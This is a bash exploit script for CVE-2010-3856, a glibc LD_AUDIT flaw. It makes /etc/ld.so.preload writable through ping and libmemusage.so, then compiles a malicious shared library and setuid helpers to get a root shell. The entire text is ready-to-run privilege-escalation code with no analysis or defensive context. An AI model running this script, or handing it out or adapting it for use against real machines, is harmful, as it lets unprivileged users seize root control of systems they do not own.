#!/bin/bash
# CVE-2010-3856
 
OUTPUT=/etc/ld.so.preload
 
MASK=`umask`
umask 0
LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="$OUTPUT" ping 2> /dev/null
if [ ! -f $OUTPUT ]; then
  echo "System does not appear to be vulnerable"
  exit 0
fi
echo -n > $OUTPUT
umask $MASK

cat > exec.c << EOF
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
EOF
gcc exec.c -o exec
 
cat > sh.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
int main ()
{
  setuid(geteuid());
  setgid(getegid());
  execl("/bin/sh", "bin/sh","-c", "cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;", NULL);
  return 0;
}
EOF
gcc sh.c -o sh
 
cat > libpwn.c << EOF
#include <sys/stat.h>
#include <unistd.h>
uid_t getuid (void)
{
  chown("$PWD/sh", 0, 0);
  chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH);
  return 0;
}
EOF
gcc -Wall -fPIC -c libpwn.c
gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o
 
echo "$PWD/libpwn.so" > $OUTPUT
ping 2> /dev/null
echo -n > $OUTPUT
./sh
